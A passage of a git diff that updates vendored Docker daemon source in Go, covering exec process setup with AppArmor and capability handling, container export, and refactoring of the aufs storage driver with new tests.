Cwd: ec.WorkingDir, + } + if p.Cwd == "" { + p.Cwd = "/" } - if err := execSetPlatformOpt(c, ec, &p); err != nil { + if err := d.execSetPlatformOpt(c, ec, p); err != nil { return err } - attachErr := container.AttachStreams(ctx, ec.StreamConfig, ec.OpenStdin, true, ec.Tty, cStdin, cStdout, cStderr, ec.DetachKeys) + attachConfig := stream.AttachConfig{ + TTY: ec.Tty, + UseStdin: cStdin != nil, + UseStdout: cStdout != nil, + UseStderr: cStderr != nil, + Stdin: cStdin, + Stdout: cStdout, + Stderr: cStderr, + DetachKeys: ec.DetachKeys, + CloseStdin: true, + } + ec.StreamConfig.AttachStreams(&attachConfig) + attachErr := ec.StreamConfig.CopyStreams(ctx, &attachConfig) - systemPid, err := d.containerd.AddProcess(ctx, c.ID, name, p, ec.InitializeStdio) + // Synchronize with libcontainerd event loop + ec.Lock() + c.ExecCommands.Lock() + systemPid, err := d.containerd.Exec(ctx, c.ID, ec.ID, p, cStdin != nil, ec.InitializeStdio) + // the exec context should be ready, or error happened. + // close the chan to notify readiness + close(ec.Started) if err != nil { - return err + c.ExecCommands.Unlock() + ec.Unlock() + return translateContainerdStartErr(ec.Entrypoint, ec.SetExitCode, err) } - ec.Lock() ec.Pid = systemPid + c.ExecCommands.Unlock() ec.Unlock() select { case <-ctx.Done(): logrus.Debugf("Sending TERM signal to process %v in container %v", name, c.ID) - d.containerd.SignalProcess(c.ID, name, int(signal.SignalMap["TERM"])) + d.containerd.SignalProcess(ctx, c.ID, name, int(signal.SignalMap["TERM"])) select { case <-time.After(termProcessTimeout * time.Second): logrus.Infof("Container %v, process %v failed to exit within %d seconds of signal TERM - using the force", c.ID, name, termProcessTimeout) - d.containerd.SignalProcess(c.ID, name, int(signal.SignalMap["KILL"])) + d.containerd.SignalProcess(ctx, c.ID, name, int(signal.SignalMap["KILL"])) case <-attachErr: // TERM signal worked } - return fmt.Errorf("context cancelled") + return ctx.Err() case err := <-attachErr: if 
err != nil { - if _, ok := err.(container.DetachError); !ok { - return fmt.Errorf("exec attach failed with error: %v", err) + if _, ok := err.(term.EscapeError); !ok { + return errdefs.System(errors.Wrap(err, "exec attach failed")) + } + attributes := map[string]string{ + "execID": ec.ID, } - d.LogContainerEvent(c, "exec_detach") + d.LogContainerEventWithAttributes(c, "exec_detach", attributes) } } return nil @@ -254,7 +298,7 @@ func (d *Daemon) execCommandGC() { for id, config := range d.execCommands.Commands() { if config.CanRemove { cleaned++ - d.execCommands.Delete(id) + d.execCommands.Delete(id, config.Pid) } else { if _, exists := liveExecCommands[id]; !exists { config.CanRemove = true diff --git a/vendor/github.com/docker/docker/daemon/exec/exec.go b/vendor/github.com/docker/docker/daemon/exec/exec.go index 933136f965..c036c46a0c 100644 --- a/vendor/github.com/docker/docker/daemon/exec/exec.go +++ b/vendor/github.com/docker/docker/daemon/exec/exec.go @@ -1,13 +1,13 @@ -package exec +package exec // import "github.com/docker/docker/daemon/exec" import ( "runtime" "sync" - "github.com/Sirupsen/logrus" + "github.com/containerd/containerd/cio" "github.com/docker/docker/container/stream" - "github.com/docker/docker/libcontainerd" "github.com/docker/docker/pkg/stringid" + "github.com/sirupsen/logrus" ) // Config holds the configurations for execs. The Daemon keeps @@ -15,6 +15,7 @@ import ( // examined both during and after completion. 
type Config struct { sync.Mutex + Started chan struct{} StreamConfig *stream.Config ID string Running bool @@ -30,6 +31,7 @@ type Config struct { Tty bool Privileged bool User string + WorkingDir string Env []string Pid int } @@ -39,11 +41,30 @@ func NewConfig() *Config { return &Config{ ID: stringid.GenerateNonCryptoID(), StreamConfig: stream.NewConfig(), + Started: make(chan struct{}), } } +type rio struct { + cio.IO + + sc *stream.Config +} + +func (i *rio) Close() error { + i.IO.Close() + + return i.sc.CloseStreams() +} + +func (i *rio) Wait() { + i.sc.Wait() + + i.IO.Wait() +} + // InitializeStdio is called by libcontainerd to connect the stdio. -func (c *Config) InitializeStdio(iop libcontainerd.IOPipe) error { +func (c *Config) InitializeStdio(iop *cio.DirectIO) (cio.IO, error) { c.StreamConfig.CopyToPipe(iop) if c.StreamConfig.Stdin() == nil && !c.Tty && runtime.GOOS == "windows" { @@ -54,7 +75,7 @@ func (c *Config) InitializeStdio(iop libcontainerd.IOPipe) error { } } - return nil + return &rio{IO: iop, sc: c.StreamConfig}, nil } // CloseStreams closes the stdio streams for the exec @@ -62,47 +83,54 @@ func (c *Config) CloseStreams() error { return c.StreamConfig.CloseStreams() } +// SetExitCode sets the exec config's exit code +func (c *Config) SetExitCode(code int) { + c.ExitCode = &code +} + // Store keeps track of the exec configurations. type Store struct { - commands map[string]*Config + byID map[string]*Config sync.RWMutex } // NewStore initializes a new exec store. func NewStore() *Store { - return &Store{commands: make(map[string]*Config, 0)} + return &Store{ + byID: make(map[string]*Config), + } } // Commands returns the exec configurations in the store. 
func (e *Store) Commands() map[string]*Config { e.RLock() - commands := make(map[string]*Config, len(e.commands)) - for id, config := range e.commands { - commands[id] = config + byID := make(map[string]*Config, len(e.byID)) + for id, config := range e.byID { + byID[id] = config } e.RUnlock() - return commands + return byID } // Add adds a new exec configuration to the store. func (e *Store) Add(id string, Config *Config) { e.Lock() - e.commands[id] = Config + e.byID[id] = Config e.Unlock() } // Get returns an exec configuration by its id. func (e *Store) Get(id string) *Config { e.RLock() - res := e.commands[id] + res := e.byID[id] e.RUnlock() return res } // Delete removes an exec configuration from the store. -func (e *Store) Delete(id string) { +func (e *Store) Delete(id string, pid int) { e.Lock() - delete(e.commands, id) + delete(e.byID, id) e.Unlock() } @@ -110,7 +138,7 @@ func (e *Store) Delete(id string) { func (e *Store) List() []string { var IDs []string e.RLock() - for id := range e.commands { + for id := range e.byID { IDs = append(IDs, id) } e.RUnlock() diff --git a/vendor/github.com/docker/docker/daemon/exec_linux.go b/vendor/github.com/docker/docker/daemon/exec_linux.go index 5aeedc3470..cd52f4886f 100644 --- a/vendor/github.com/docker/docker/daemon/exec_linux.go +++ b/vendor/github.com/docker/docker/daemon/exec_linux.go @@ -1,27 +1,59 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/container" "github.com/docker/docker/daemon/caps" "github.com/docker/docker/daemon/exec" - "github.com/docker/docker/libcontainerd" + "github.com/opencontainers/runc/libcontainer/apparmor" "github.com/opencontainers/runtime-spec/specs-go" ) -func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error { +func (daemon *Daemon) execSetPlatformOpt(c *container.Container, ec *exec.Config, p *specs.Process) error { if len(ec.User) > 0 { uid, gid, additionalGids, err := 
getUser(c, ec.User) if err != nil { return err } - p.User = &specs.User{ + p.User = specs.User{ UID: uid, GID: gid, AdditionalGids: additionalGids, } } if ec.Privileged { - p.Capabilities = caps.GetAllCapabilities() + if p.Capabilities == nil { + p.Capabilities = &specs.LinuxCapabilities{} + } + p.Capabilities.Bounding = caps.GetAllCapabilities() + p.Capabilities.Permitted = p.Capabilities.Bounding + p.Capabilities.Inheritable = p.Capabilities.Bounding + p.Capabilities.Effective = p.Capabilities.Bounding + } + if apparmor.IsEnabled() { + var appArmorProfile string + if c.AppArmorProfile != "" { + appArmorProfile = c.AppArmorProfile + } else if c.HostConfig.Privileged { + // `docker exec --privileged` does not currently disable AppArmor + // profiles. Privileged configuration of the container is inherited + appArmorProfile = "unconfined" + } else { + appArmorProfile = "docker-default" + } + + if appArmorProfile == "docker-default" { + // Unattended upgrades and other fun services can unload AppArmor + // profiles inadvertently. Since we cannot store our profile in + // /etc/apparmor.d, nor can we practically add other ways of + // telling the system to keep our profile loaded, in order to make + // sure that we keep the default profile enabled we dynamically + // reload it if necessary. 
+ if err := ensureDefaultAppArmorProfile(); err != nil { + return err + } + } + p.ApparmorProfile = appArmorProfile } + daemon.setRlimits(&specs.Spec{Process: p}, c) return nil } diff --git a/vendor/github.com/docker/docker/daemon/exec_linux_test.go b/vendor/github.com/docker/docker/daemon/exec_linux_test.go new file mode 100644 index 0000000000..0db7f080db --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/exec_linux_test.go @@ -0,0 +1,53 @@ +// +build linux + +package daemon + +import ( + "testing" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" + "github.com/opencontainers/runc/libcontainer/apparmor" + "github.com/opencontainers/runtime-spec/specs-go" + "gotest.tools/assert" +) + +func TestExecSetPlatformOpt(t *testing.T) { + if !apparmor.IsEnabled() { + t.Skip("requires AppArmor to be enabled") + } + d := &Daemon{} + c := &container.Container{AppArmorProfile: "my-custom-profile"} + ec := &exec.Config{} + p := &specs.Process{} + + err := d.execSetPlatformOpt(c, ec, p) + assert.NilError(t, err) + assert.Equal(t, "my-custom-profile", p.ApparmorProfile) +} + +// TestExecSetPlatformOptPrivileged verifies that `docker exec --privileged` +// does not disable AppArmor profiles. Exec currently inherits the `Privileged` +// configuration of the container. See https://github.com/moby/moby/pull/31773#discussion_r105586900 +// +// This behavior may change in future, but test for the behavior to prevent it +// from being changed accidentally. 
+func TestExecSetPlatformOptPrivileged(t *testing.T) { + if !apparmor.IsEnabled() { + t.Skip("requires AppArmor to be enabled") + } + d := &Daemon{} + c := &container.Container{AppArmorProfile: "my-custom-profile"} + ec := &exec.Config{Privileged: true} + p := &specs.Process{} + + err := d.execSetPlatformOpt(c, ec, p) + assert.NilError(t, err) + assert.Equal(t, "my-custom-profile", p.ApparmorProfile) + + c.HostConfig = &containertypes.HostConfig{Privileged: true} + err = d.execSetPlatformOpt(c, ec, p) + assert.NilError(t, err) + assert.Equal(t, "unconfined", p.ApparmorProfile) +} diff --git a/vendor/github.com/docker/docker/daemon/exec_solaris.go b/vendor/github.com/docker/docker/daemon/exec_solaris.go deleted file mode 100644 index 7003355d91..0000000000 --- a/vendor/github.com/docker/docker/daemon/exec_solaris.go +++ /dev/null @@ -1,11 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/container" - "github.com/docker/docker/daemon/exec" - "github.com/docker/docker/libcontainerd" -) - -func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/exec_windows.go b/vendor/github.com/docker/docker/daemon/exec_windows.go index 1d6974cda9..c37ea9f31a 100644 --- a/vendor/github.com/docker/docker/daemon/exec_windows.go +++ b/vendor/github.com/docker/docker/daemon/exec_windows.go @@ -1,14 +1,16 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/container" "github.com/docker/docker/daemon/exec" - "github.com/docker/docker/libcontainerd" + specs "github.com/opencontainers/runtime-spec/specs-go" ) -func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error { +func (daemon *Daemon) execSetPlatformOpt(c *container.Container, ec *exec.Config, p *specs.Process) error { // Process arguments need to be escaped before sending to OCI. 
- p.Args = escapeArgs(p.Args) - p.User.Username = ec.User + if c.OS == "windows" { + p.Args = escapeArgs(p.Args) + p.User.Username = ec.User + } return nil } diff --git a/vendor/github.com/docker/docker/daemon/export.go b/vendor/github.com/docker/docker/daemon/export.go index 5ef6dbb0e5..737e161edc 100644 --- a/vendor/github.com/docker/docker/daemon/export.go +++ b/vendor/github.com/docker/docker/daemon/export.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" @@ -6,22 +6,34 @@ import ( "runtime" "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/system" ) // ContainerExport writes the contents of the container to the given // writer. An error is returned if the container cannot be found. func (daemon *Daemon) ContainerExport(name string, out io.Writer) error { - if runtime.GOOS == "windows" { - return fmt.Errorf("the daemon on this platform does not support export of a container") - } - container, err := daemon.GetContainer(name) if err != nil { return err } + if runtime.GOOS == "windows" && container.OS == "windows" { + return fmt.Errorf("the daemon on this operating system does not support exporting Windows containers") + } + + if container.IsDead() { + err := fmt.Errorf("You cannot export container %s which is Dead", container.ID) + return errdefs.Conflict(err) + } + + if container.IsRemovalInProgress() { + err := fmt.Errorf("You cannot export container %s which is being removed", container.ID) + return errdefs.Conflict(err) + } + data, err := daemon.containerExport(container) if err != nil { return fmt.Errorf("Error exporting container %s: %v", name, err) @@ -35,24 +47,38 @@ func (daemon *Daemon) ContainerExport(name string, out io.Writer) error { return nil } -func (daemon *Daemon) containerExport(container *container.Container) (io.ReadCloser, error) { - if err := 
daemon.Mount(container); err != nil { +func (daemon *Daemon) containerExport(container *container.Container) (arch io.ReadCloser, err error) { + if !system.IsOSSupported(container.OS) { + return nil, fmt.Errorf("cannot export %s: %s ", container.ID, system.ErrNotSupportedOperatingSystem) + } + rwlayer, err := daemon.imageService.GetLayerByID(container.ID, container.OS) + if err != nil { + return nil, err + } + defer func() { + if err != nil { + daemon.imageService.ReleaseLayer(rwlayer, container.OS) + } + }() + + basefs, err := rwlayer.Mount(container.GetMountLabel()) + if err != nil { return nil, err } - uidMaps, gidMaps := daemon.GetUIDGIDMaps() - archive, err := archive.TarWithOptions(container.BaseFS, &archive.TarOptions{ + archive, err := archivePath(basefs, basefs.Path(), &archive.TarOptions{ Compression: archive.Uncompressed, - UIDMaps: uidMaps, - GIDMaps: gidMaps, + UIDMaps: daemon.idMappings.UIDs(), + GIDMaps: daemon.idMappings.GIDs(), }) if err != nil { - daemon.Unmount(container) + rwlayer.Unmount() return nil, err } - arch := ioutils.NewReadCloserWrapper(archive, func() error { + arch = ioutils.NewReadCloserWrapper(archive, func() error { err := archive.Close() - daemon.Unmount(container) + rwlayer.Unmount() + daemon.imageService.ReleaseLayer(rwlayer, container.OS) return err }) daemon.LogContainerEvent(container, "export") diff --git a/vendor/github.com/docker/docker/daemon/getsize_unix.go b/vendor/github.com/docker/docker/daemon/getsize_unix.go deleted file mode 100644 index 707323a4bf..0000000000 --- a/vendor/github.com/docker/docker/daemon/getsize_unix.go +++ /dev/null @@ -1,41 +0,0 @@ -// +build linux freebsd solaris - -package daemon - -import ( - "github.com/Sirupsen/logrus" - "github.com/docker/docker/container" -) - -// getSize returns the real size & virtual size of the container. 
-func (daemon *Daemon) getSize(container *container.Container) (int64, int64) { - var ( - sizeRw, sizeRootfs int64 - err error - ) - - if err := daemon.Mount(container); err != nil { - logrus.Errorf("Failed to compute size of container rootfs %s: %s", container.ID, err) - return sizeRw, sizeRootfs - } - defer daemon.Unmount(container) - - sizeRw, err = container.RWLayer.Size() - if err != nil { - logrus.Errorf("Driver %s couldn't return diff size of container %s: %s", - daemon.GraphDriverName(), container.ID, err) - // FIXME: GetSize should return an error. Not changing it now in case - // there is a side-effect. - sizeRw = -1 - } - - if parent := container.RWLayer.Parent(); parent != nil { - sizeRootfs, err = parent.Size() - if err != nil { - sizeRootfs = -1 - } else if sizeRw != -1 { - sizeRootfs += sizeRw - } - } - return sizeRw, sizeRootfs -} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go index ec55ea4cde..9152252770 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go @@ -20,10 +20,11 @@ aufs driver directory structure */ -package aufs +package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs" import ( "bufio" + "context" "fmt" "io" "io/ioutil" @@ -33,21 +34,23 @@ import ( "path/filepath" "strings" "sync" - "syscall" "time" - "github.com/Sirupsen/logrus" - "github.com/vbatts/tar-split/tar/storage" - "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/directory" "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/locker" mountpk "github.com/docker/docker/pkg/mount" - - "github.com/opencontainers/runc/libcontainer/label" + "github.com/docker/docker/pkg/system" rsystem 
"github.com/opencontainers/runc/libcontainer/system" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "github.com/vbatts/tar-split/tar/storage" + "golang.org/x/sys/unix" ) var ( @@ -59,6 +62,8 @@ var ( enableDirpermLock sync.Once enableDirperm bool + + logger = logrus.WithField("storage-driver", "aufs") ) func init() { @@ -75,18 +80,28 @@ type Driver struct { pathCacheLock sync.Mutex pathCache map[string]string naiveDiff graphdriver.DiffDriver + locker *locker.Locker } // Init returns a new AUFS driver. // An error is returned if AUFS is not supported. func Init(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { - // Try to load the aufs kernel module if err := supportsAufs(); err != nil { + logger.Error(err) return nil, graphdriver.ErrNotSupported } - fsMagic, err := graphdriver.GetFSMagic(root) + // Perform feature detection on /var/lib/docker/aufs if it's an existing directory. + // This covers situations where /var/lib/docker/aufs is a mount, and on a different + // filesystem than /var/lib/docker. + // If the path does not exist, fall back to using /var/lib/docker for feature detection. 
+ testdir := root + if _, err := os.Stat(testdir); os.IsNotExist(err) { + testdir = filepath.Dir(testdir) + } + + fsMagic, err := graphdriver.GetFSMagic(testdir) if err != nil { return nil, err } @@ -96,7 +111,7 @@ func Init(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap switch fsMagic { case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicEcryptfs: - logrus.Errorf("AUFS is not supported over %s", backingFs) + logger.Errorf("AUFS is not supported over %s", backingFs) return nil, graphdriver.ErrIncompatibleFS } @@ -112,33 +127,45 @@ func Init(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap gidMaps: gidMaps, pathCache: make(map[string]string), ctr: graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicAufs)), + locker: locker.New(), } rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) if err != nil { return nil, err } - // Create the root aufs driver dir and return - // if it already exists - // If not populate the dir structure - if err := idtools.MkdirAllAs(root, 0700, rootUID, rootGID); err != nil { - if os.IsExist(err) { - return a, nil - } - return nil, err - } - - if err := mountpk.MakePrivate(root); err != nil { + // Create the root aufs driver dir + if err := idtools.MkdirAllAndChown(root, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { return nil, err } // Populate the dir structure for _, p := range paths { - if err := idtools.MkdirAllAs(path.Join(root, p), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(path.Join(root, p), 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { return nil, err } } + for _, path := range []string{"mnt", "diff"} { + p := filepath.Join(root, path) + entries, err := ioutil.ReadDir(p) + if err != nil { + logger.WithError(err).WithField("dir", p).Error("error reading dir entries") + continue + } + for _, entry := range entries { + if !entry.IsDir() { + continue + } + if 
strings.HasSuffix(entry.Name(), "-removing") { + logger.WithField("dir", entry.Name()).Debug("Cleaning up stale layer dir") + if err := system.EnsureRemoveAll(filepath.Join(p, entry.Name())); err != nil { + logger.WithField("dir", entry.Name()).WithError(err).Error("Error removing stale layer dir") + } + } + } + } + a.naiveDiff = graphdriver.NewNaiveDiffDriver(a, uidMaps, gidMaps) return a, nil } @@ -262,48 +289,17 @@ func (a *Driver) createDirsFor(id string) error { // The path of directories are /mnt/ // and /diff/ for _, p := range paths { - if err := idtools.MkdirAllAs(path.Join(a.rootPath(), p, id), 0755, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(path.Join(a.rootPath(), p, id), 0755, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { return err } } return nil } -// Helper function to debug EBUSY errors on remove. -func debugEBusy(mountPath string) (out []string, err error) { - // lsof is not part of GNU coreutils. This is a best effort - // attempt to detect offending processes. - c := exec.Command("lsof") - - r, err := c.StdoutPipe() - if err != nil { - return nil, fmt.Errorf("Assigning pipes failed with %v", err) - } - - if err := c.Start(); err != nil { - return nil, fmt.Errorf("Starting %s failed with %v", c.Path, err) - } - - defer func() { - waiterr := c.Wait() - if waiterr != nil && err == nil { - err = fmt.Errorf("Waiting for %s failed with %v", c.Path, waiterr) - } - }() - - sc := bufio.NewScanner(r) - for sc.Scan() { - entry := sc.Text() - if strings.Contains(entry, mountPath) { - out = append(out, entry, "\n") - } - } - - return out, nil -} - // Remove will unmount and remove the given id. 
func (a *Driver) Remove(id string) error { + a.locker.Lock(id) + defer a.locker.Unlock(id) a.pathCacheLock.Lock() mountpoint, exists := a.pathCache[id] a.pathCacheLock.Unlock() @@ -311,61 +307,55 @@ func (a *Driver) Remove(id string) error { mountpoint = a.getMountpoint(id) } + logger := logger.WithField("layer", id) + var retries int for { mounted, err := a.mounted(mountpoint) if err != nil { + if os.IsNotExist(err) { + break + } return err } if !mounted { break } - if err := a.unmount(mountpoint); err != nil { - if err != syscall.EBUSY { - return fmt.Errorf("aufs: unmount error: %s: %v", mountpoint, err) - } - if retries >= 5 { - out, debugErr := debugEBusy(mountpoint) - if debugErr == nil { - logrus.Warnf("debugEBusy returned %v", out) - } - return fmt.Errorf("aufs: unmount error after retries: %s: %v", mountpoint, err) - } - // If unmount returns EBUSY, it could be a transient error. Sleep and retry. - retries++ - logrus.Warnf("unmount failed due to EBUSY: retry count: %d", retries) - time.Sleep(100 * time.Millisecond) - continue + err = a.unmount(mountpoint) + if err == nil { + break } - break - } - // Atomically remove each directory in turn by first moving it out of the - // way (so that docker doesn't find it anymore) before doing removal of - // the whole tree. 
- tmpMntPath := path.Join(a.mntPath(), fmt.Sprintf("%s-removing", id)) - if err := os.Rename(mountpoint, tmpMntPath); err != nil && !os.IsNotExist(err) { - if err == syscall.EBUSY { - logrus.Warn("os.Rename err due to EBUSY") - out, debugErr := debugEBusy(mountpoint) - if debugErr == nil { - logrus.Warnf("debugEBusy returned %v", out) - } + if err != unix.EBUSY { + return errors.Wrapf(err, "aufs: unmount error: %s", mountpoint) } - return err - } - defer os.RemoveAll(tmpMntPath) - - tmpDiffpath := path.Join(a.diffPath(), fmt.Sprintf("%s-removing", id)) - if err := os.Rename(a.getDiffPath(id), tmpDiffpath); err != nil && !os.IsNotExist(err) { - return err + if retries >= 5 { + return errors.Wrapf(err, "aufs: unmount error after retries: %s", mountpoint) + } + // If unmount returns EBUSY, it could be a transient error. Sleep and retry. + retries++ + logger.Warnf("unmount failed due to EBUSY: retry count: %d", retries) + time.Sleep(100 * time.Millisecond) } - defer os.RemoveAll(tmpDiffpath) // Remove the layers file for the id if err := os.Remove(path.Join(a.rootPath(), "layers", id)); err != nil && !os.IsNotExist(err) { - return err + return errors.Wrapf(err, "error removing layers dir for %s", id) + } + + if err := atomicRemove(a.getDiffPath(id)); err != nil { + return errors.Wrapf(err, "could not remove diff path for id %s", id) + } + + // Atomically remove each directory in turn by first moving it out of the + // way (so that docker doesn't find it anymore) before doing removal of + // the whole tree. 
+ if err := atomicRemove(mountpoint); err != nil { + if errors.Cause(err) == unix.EBUSY { + logger.WithField("dir", mountpoint).WithError(err).Warn("error performing atomic remove due to EBUSY") + } + return errors.Wrapf(err, "could not remove mountpoint for id %s", id) } a.pathCacheLock.Lock() @@ -374,12 +364,32 @@ func (a *Driver) Remove(id string) error { return nil } +func atomicRemove(source string) error { + target := source + "-removing" + + err := os.Rename(source, target) + switch { + case err == nil, os.IsNotExist(err): + case os.IsExist(err): + // Got error saying the target dir already exists, maybe the source doesn't exist due to a previous (failed) remove + if _, e := os.Stat(source); !os.IsNotExist(e) { + return errors.Wrapf(err, "target rename dir '%s' exists but should not, this needs to be manually cleaned up") + } + default: + return errors.Wrapf(err, "error preparing atomic delete") + } + + return system.EnsureRemoveAll(target) +} + // Get returns the rootfs path for the id. 
// This will mount the dir at its given path -func (a *Driver) Get(id, mountLabel string) (string, error) { +func (a *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) { + a.locker.Lock(id) + defer a.locker.Unlock(id) parents, err := a.getParentLayerPaths(id) if err != nil && !os.IsNotExist(err) { - return "", err + return nil, err } a.pathCacheLock.Lock() @@ -393,25 +403,27 @@ func (a *Driver) Get(id, mountLabel string) (string, error) { } } if count := a.ctr.Increment(m); count > 1 { - return m, nil + return containerfs.NewLocalContainerFS(m), nil } // If a dir does not have a parent ( no layers )do not try to mount // just return the diff path to the data if len(parents) > 0 { if err := a.mount(id, m, mountLabel, parents); err != nil { - return "", err + return nil, err } } a.pathCacheLock.Lock() a.pathCache[id] = m a.pathCacheLock.Unlock() - return m, nil + return containerfs.NewLocalContainerFS(m), nil } // Put unmounts and updates list of active mounts. func (a *Driver) Put(id string) error { + a.locker.Lock(id) + defer a.locker.Unlock(id) a.pathCacheLock.Lock() m, exists := a.pathCache[id] if !exists { @@ -425,7 +437,7 @@ func (a *Driver) Put(id string) error { err := a.unmount(m) if err != nil { - logrus.Debugf("Failed to unmount %s aufs: %v", id, err) + logger.Debugf("Failed to unmount %s aufs: %v", id, err) } return err } @@ -485,7 +497,7 @@ func (a *Driver) DiffSize(id, parent string) (size int64, err error) { return a.naiveDiff.DiffSize(id, parent) } // AUFS doesn't need the parent layer to calculate the diff size. 
- return directory.Size(path.Join(a.rootPath(), "diff", id)) + return directory.Size(context.TODO(), path.Join(a.rootPath(), "diff", id)) } // ApplyDiff extracts the changeset from the given diff into the @@ -558,10 +570,7 @@ func (a *Driver) unmount(mountPath string) error { if mounted, err := a.mounted(mountPath); err != nil || !mounted { return err } - if err := Unmount(mountPath); err != nil { - return err - } - return nil + return Unmount(mountPath) } func (a *Driver) mounted(mountpoint string) (bool, error) { @@ -586,10 +595,10 @@ func (a *Driver) Cleanup() error { for _, m := range dirs { if err := a.unmount(m); err != nil { - logrus.Debugf("aufs error unmounting %s: %s", m, err) + logger.Debugf("error unmounting %s: %s", m, err) } } - return mountpk.Unmount(a.root) + return mountpk.RecursiveUnmount(a.root) } func (a *Driver) aufsMount(ro []string, rw, target, mountLabel string) (err error) { @@ -604,9 +613,9 @@ func (a *Driver) aufsMount(ro []string, rw, target, mountLabel string) (err erro offset := 54 if useDirperm() { - offset += len("dirperm1") + offset += len(",dirperm1") } - b := make([]byte, syscall.Getpagesize()-len(mountLabel)-offset) // room for xino & mountLabel + b := make([]byte, unix.Getpagesize()-len(mountLabel)-offset) // room for xino & mountLabel bp := copy(b, fmt.Sprintf("br:%s=rw", rw)) index := 0 @@ -630,7 +639,7 @@ func (a *Driver) aufsMount(ro []string, rw, target, mountLabel string) (err erro for ; index < len(ro); index++ { layer := fmt.Sprintf(":%s=ro+wh", ro[index]) data := label.FormatMountLabel(fmt.Sprintf("append%s", layer), mountLabel) - if err = mount("none", target, "aufs", syscall.MS_REMOUNT, data); err != nil { + if err = mount("none", target, "aufs", unix.MS_REMOUNT, data); err != nil { return } } @@ -644,14 +653,14 @@ func useDirperm() bool { enableDirpermLock.Do(func() { base, err := ioutil.TempDir("", "docker-aufs-base") if err != nil { - logrus.Errorf("error checking dirperm1: %v", err) + logger.Errorf("error checking 
dirperm1: %v", err) return } defer os.RemoveAll(base) union, err := ioutil.TempDir("", "docker-aufs-union") if err != nil { - logrus.Errorf("error checking dirperm1: %v", err) + logger.Errorf("error checking dirperm1: %v", err) return } defer os.RemoveAll(union) @@ -662,7 +671,7 @@ func useDirperm() bool { } enableDirperm = true if err := Unmount(union); err != nil { - logrus.Errorf("error checking dirperm1: failed to unmount %v", err) + logger.Errorf("error checking dirperm1: failed to unmount %v", err) } }) return enableDirperm diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go index dc3c6a392b..fdc502ba65 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go @@ -1,6 +1,6 @@ // +build linux -package aufs +package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs" import ( "crypto/sha256" @@ -9,6 +9,7 @@ import ( "io/ioutil" "os" "path" + "path/filepath" "sync" "testing" @@ -16,6 +17,8 @@ import ( "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/reexec" "github.com/docker/docker/pkg/stringid" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) var ( @@ -39,6 +42,14 @@ func testInit(dir string, t testing.TB) graphdriver.Driver { return d } +func driverGet(d *Driver, id string, mntLabel string) (string, error) { + mnt, err := d.Get(id, mntLabel) + if err != nil { + return "", err + } + return mnt.Path(), nil +} + func newDriver(t testing.TB) *Driver { if err := os.MkdirAll(tmp, 0755); err != nil { t.Fatal(err) @@ -56,7 +67,7 @@ func TestNewDriver(t *testing.T) { d := testInit(tmp, t) defer os.RemoveAll(tmp) if d == nil { - t.Fatalf("Driver should not be nil") + t.Fatal("Driver should not be nil") } } @@ -147,7 +158,10 @@ func TestRemoveImage(t *testing.T) { for _, p := range paths { if _, err := os.Stat(path.Join(tmp, p, 
